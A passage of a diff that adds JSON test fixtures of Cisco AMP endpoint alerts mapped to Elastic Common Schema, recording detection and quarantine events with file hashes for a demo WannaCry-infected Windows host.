+                "action": "Quarantine Failure",
+                "id": "6419179217757405000",
+                "category": [
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "53:74:31:cb:37:50",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "53:74:31:cb:37:50"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "error": {
+                        "description": "Delete pending",
+                        "error_code": 3221225558
+                    },
+                    "detection_id": "6419179213462437901",
+                    "event_type_id": 2164260880
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T11:26:37.000Z",
+            "file": {
+                "hash": {
+                    "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_WannaCry_Ransomware"
+                ],
+                "hash": [
+                    "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_WannaCry_Ransomware",
+                "hostname": "Demo_WannaCry_Ransomware"
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:32:23.854043976Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179217757405000,\"timestamp\":1610623597,\"timestamp_nanoseconds\":329000000,\"date\":\"2021-01-14T11:26:37+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419179204872503300\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
+                "kind": "alert",
+                "action": "Quarantine Failure",
+                "id": "6419179217757405000",
+                "category": [
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "53:74:31:cb:37:50",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "53:74:31:cb:37:50"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "error": {
+                        "description": "Object name not found",
+                        "error_code": 3221225524
+                    },
+                    "detection_id": "6419179204872503300",
+                    "event_type_id": 2164260880
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T11:26:37.000Z",
+            "file": {
+                "name": "tasksche.exe",
+                "path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe",
+                "hash": {
+                    "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "user": [
+                    "user@testdomain.com"
+                ],
+                "hosts": [
+                    "Demo_WannaCry_Ransomware"
+                ],
+                "hash": [
+                    "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_WannaCry_Ransomware",
+                "hostname": "Demo_WannaCry_Ransomware",
+                "os": {
+                    "family": "windows",
+                    "platform": "windows"
+                },
+                "user": {
+                    "name": "user@testdomain.com"
+                }
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:32:23.854045878Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179217757405000,\"timestamp\":1610623597,\"timestamp_nanoseconds\":797000000,\"date\":\"2021-01-14T11:26:37+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419179217757405206\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
+                "kind": "alert",
+                "action": "Threat Detected",
+                "id": "6419179217757405000",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "W32.File.MalParent",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "53:74:31:cb:37:50",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "53:74:31:cb:37:50"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6419179217757405206",
+                    "event_type_id": 1090519054
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T11:26:37.000Z",
+            "file": {
+                "hash": {
+                    "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_WannaCry_Ransomware"
+                ],
+                "hash": [
+                    "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_WannaCry_Ransomware",
+                "hostname": "Demo_WannaCry_Ransomware"
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:32:23.854047755Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179217757405000,\"timestamp\":1610623597,\"timestamp_nanoseconds\":329000000,\"date\":\"2021-01-14T11:26:37+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419179204872503298\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
+                "kind": "alert",
+                "action": "Threat Quarantined",
+                "id": "6419179217757405000",
+                "category": [
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "53:74:31:cb:37:50",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "53:74:31:cb:37:50"
+                        ]
+                    },
+                    "detection_id": "6419179204872503298",
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "event_type_id": 553648143
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T11:26:37.000Z",
+            "file": {
+                "hash": {
+                    "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_WannaCry_Ransomware"
+                ],
+                "hash": [
+                    "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_WannaCry_Ransomware",
+                "hostname": "Demo_WannaCry_Ransomware"
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:32:23.854049645Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179217757405000,\"timestamp\":1610623597,\"timestamp_nanoseconds\":329000000,\"date\":\"2021-01-14T11:26:37+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419179204872503301\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
+                "kind": "alert",
+                "action": "Threat Quarantined",
+                "id": "6419179217757405000",
+                "category": [
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "53:74:31:cb:37:50",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "53:74:31:cb:37:50"
+                        ]
+                    },
+                    "detection_id": "6419179204872503301",
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "event_type_id": 553648143
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T11:26:36.000Z",
+            "file": {
+                "name": "tasksche.exe",
+                "path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe",
+                "hash": {
+                    "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "user": [
+                    "user@testdomain.com"
+                ],
+                "hosts": [
+                    "Demo_WannaCry_Ransomware"
+                ],
+                "hash": [
+                    "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_WannaCry_Ransomware",
+                "hostname": "Demo_WannaCry_Ransomware",
+                "os": {
+                    "family": "windows",
+                    "platform": "windows"
+                },
+                "user": {
+                    "name": "user@testdomain.com"
+                }
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:32:23.854051576Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179213462438000,\"timestamp\":1610623596,\"timestamp_nanoseconds\":893000000,\"date\":\"2021-01-14T11:26:36+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419179213462437902\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
+                "kind": "alert",
+                "action": "Threat Detected",
+                "id": "6419179213462438000",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "W32.File.MalParent",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "53:74:31:cb:37:50",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "53:74:31:cb:37:50"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6419179213462437902",
+                    "event_type_id": 1090519054
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T11:26:36.000Z",
+            "file": {
+                "name": "tasksche.exe",
+                "path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe",
+                "hash": {
+                    "sha1": "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467",
+                    "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa",
+                    "md5": "84c82835a5d21bbcf75a61706d8ab549"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "user": [
+                    "user@testdomain.com"
+                ],
+                "hosts": [
+                    "Demo_WannaCry_Ransomware"
+                ],
+                "hash": [
+                    "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa",
+                    "84c82835a5d21bbcf75a61706d8ab549",
+                    "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_WannaCry_Ransomware",
+                "hostname": "Demo_WannaCry_Ransomware",
+                "os": {
+                    "family": "windows",
+                    "platform": "windows"
+                },
+                "user": {
+                    "name": "user@testdomain.com"
+                }
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:32:23.854053426Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179213462438000,\"timestamp\":1610623596,\"timestamp_nanoseconds\":456000000,\"date\":\"2021-01-14T11:26:36+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419179213462437899\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}",
+                "kind": "alert",
+                "action": "Threat Detected",
+                "id": "6419179213462438000",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "W32.File.MalParent",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "53:74:31:cb:37:50",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "53:74:31:cb:37:50"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6419179213462437899",
+                    "event_type_id": 1090519054
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T11:26:36.000Z",
+            "file": {
+                "hash": {
+                    "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_WannaCry_Ransomware"
+                ],
+                "hash": [
+                    "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_WannaCry_Ransomware",
+                "hostname": "Demo_WannaCry_Ransomware"
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:32:23.854055298Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179213462438000,\"timestamp\":1610623596,\"timestamp_nanoseconds\":643000000,\"date\":\"2021-01-14T11:26:36+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419179204872503299\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
+                "kind": "alert",
+                "action": "Threat Quarantined",
+                "id": "6419179213462438000",
+                "category": [
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "53:74:31:cb:37:50",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "53:74:31:cb:37:50"
+                        ]
+                    },
+                    "detection_id": "6419179204872503299",
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "event_type_id": 553648143
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T11:26:35.000Z",
+            "file": {
+                "name": "tasksche.exe",
+                "path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe",
+                "hash": {
+                    "sha1": "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467",
+                    "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa",
+                    "md5": "84c82835a5d21bbcf75a61706d8ab549"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "user": [
+                    "user@testdomain.com"
+                ],
+                "hosts": [
+                    "Demo_WannaCry_Ransomware"
+                ],
+                "hash": [
+                    "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa",
+                    "84c82835a5d21bbcf75a61706d8ab549",
+                    "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_WannaCry_Ransomware",
+                "hostname": "Demo_WannaCry_Ransomware",
+                "os": {
+                    "family": "windows",
+                    "platform": "windows"
+                },
+                "user": {
+                    "name": "user@testdomain.com"
+                }
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:32:23.854057182Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179209167471000,\"timestamp\":1610623595,\"timestamp_nanoseconds\":957000000,\"date\":\"2021-01-14T11:26:35+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419179209167470602\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}",
+                "kind": "alert",
+                "action": "Threat Detected",
+                "id": "6419179209167471000",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "W32.File.MalParent",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "53:74:31:cb:37:50",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "53:74:31:cb:37:50"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6419179209167470602",
+                    "event_type_id": 1090519054
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T11:26:35.000Z",
+            "file": {
+                "name": "tasksche.exe",
+                "path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe",
+                "hash": {
+                    "sha1": "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467",
+                    "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa",
+                    "md5": "84c82835a5d21bbcf75a61706d8ab549"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "user": [
+                    "user@testdomain.com"
+                ],
+                "hosts": [
+                    "Demo_WannaCry_Ransomware"
+                ],
+                "hash": [
+                    "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa",
+                    "84c82835a5d21bbcf75a61706d8ab549",
+                    "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_WannaCry_Ransomware",
+                "hostname": "Demo_WannaCry_Ransomware",
+                "os": {
+                    "family": "windows",
+                    "platform": "windows"
+                },
+                "user": {
+                    "name": "user@testdomain.com"
+                }
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:32:23.854059068Z",
